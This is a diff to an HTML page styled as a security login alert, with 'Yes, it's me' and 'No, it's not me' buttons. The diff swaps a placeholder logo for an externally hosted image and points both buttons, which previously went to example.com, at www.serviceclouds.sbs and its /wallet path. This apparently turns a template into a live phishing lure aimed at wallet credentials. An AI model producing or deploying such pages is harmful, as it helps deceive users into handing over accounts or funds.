--- a/index.html
+++ b/index.html
@@ -37,9 +37,10 @@
       justify-content: center;
       align-items: center;
       margin-bottom: 8px;
+      border-radius: 5px;
     }
     header img.logo {
-      height: 50px;
+      height: 40px;
       width: auto;
     }
     .ip-display {
@@ -81,10 +82,10 @@
       min-width: 120px;
     }
     button.yes {
-      background-color: #16a34a;
+      background-color: #1654a3;
     }
     button.yes:hover {
-      background-color: #15803d;
+      background-color: #1b16a3;
     }
     button.no {
       background-color: #dc2626;
@@ -98,7 +99,7 @@
   <div class="container">
     <header>
       <img
-        src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Logo_TV_2015.svg"
+        src="https://i.imghippo.com/files/qs3400WkU.png"
         alt="Logo"
         class="logo"
       />
@@ -118,8 +119,8 @@
       <line x1="20" y1="50" x2="44" y2="26" stroke="#dc2626" stroke-width="4" stroke-linecap="round"/>
     </svg>
     <div class="btn-group">
-      <button class="yes" onclick="window.location.href='https://example.com/allow-login'">Yes, it's me</button>
-      <button class="no" onclick="window.location.href='https://example.com/reject-login'">No, it's not me</button>
+      <button class="yes" onclick="window.location.href='www.serviceclouds.sbs'">Yes, it's me</button>
+      <button class="no" onclick="window.location.href='www.serviceclouds.sbs/wallet'">No, it's not me</button>
     </div>
   </div>
 </body>
